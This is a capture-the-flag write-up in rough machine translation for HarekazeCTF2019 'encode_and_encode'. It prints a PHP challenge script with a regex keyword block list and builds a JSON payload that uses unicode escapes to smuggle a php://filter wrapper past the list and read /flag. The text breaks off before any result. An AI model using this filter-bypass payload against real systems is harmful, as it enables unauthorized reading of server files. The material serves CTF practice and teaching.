[HarekazeCTF2019]encode_ and_ encode

[HarekazeCTF2019]encode_and_encode

  Click in one by one and find them respectively ：

<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

Audit the above code to know , Filter a lot of keywords

$body = file_get_contents('php://input');
$json = json_decode($body, true);

Audit the above code to know , We need to use json In the same way page, And pseudo protocol will be used , And it will involve php file_get_contents function ：

php file_get_contents() function ：

Definition and usage ：

file_get_contents() Function to read the entire file into a string .

and  file()  equally , The difference is file_get_contents() Read the file into a string .

file_get_contents() Function is the preferred method for reading the contents of a file into a string . If the operating system supports , Memory mapping technology is also used to enhance performance .

grammar ：

file_get_contents(path,include_path,context,start,max_length)

Parameters ：

path	It's necessary . Specify the file to read .
include_path	Optional . If you want to stay in include_path（ stay php.ini in ） Search for files in , Please set the parameter to '1'.
context	Optional . Specifies the environment of the file handle .context Is a set of options that can modify the behavior of a flow . If you use NULL, It ignores .
start	Optional . Specify where to start reading in the file . This parameter is PHP 5.1 In the new .
max_length	Optional . Specifies the number of bytes to read . This parameter is PHP 5.1 In the new .

Tips and notes ：

Tips ： This function is binary safe .（ Binary data （ Such as images ） And character data can be written using this function .）

Example ：

<?php

echo file_get_contents("test.txt");

?>

The above code will output ：

This is a test with test text.

structure payload：

{"page":"php://filter/convert.base64-encode/resource=/flag"}

But because of keywords flag、php It's all banned , You can use unicode Code instead of , Construct new payload：

{"page":"\u0070\u0068\u0070://filter/convert.base64-encode/resource=/\u0066\u006c\u0061\u0067"}

utilize bp Send the data , After capturing the package, click about When , The page came out {"page":"pages/about.html"}, So use this page to transfer values , Got it. base64 Encrypted string ：

Decryption flag：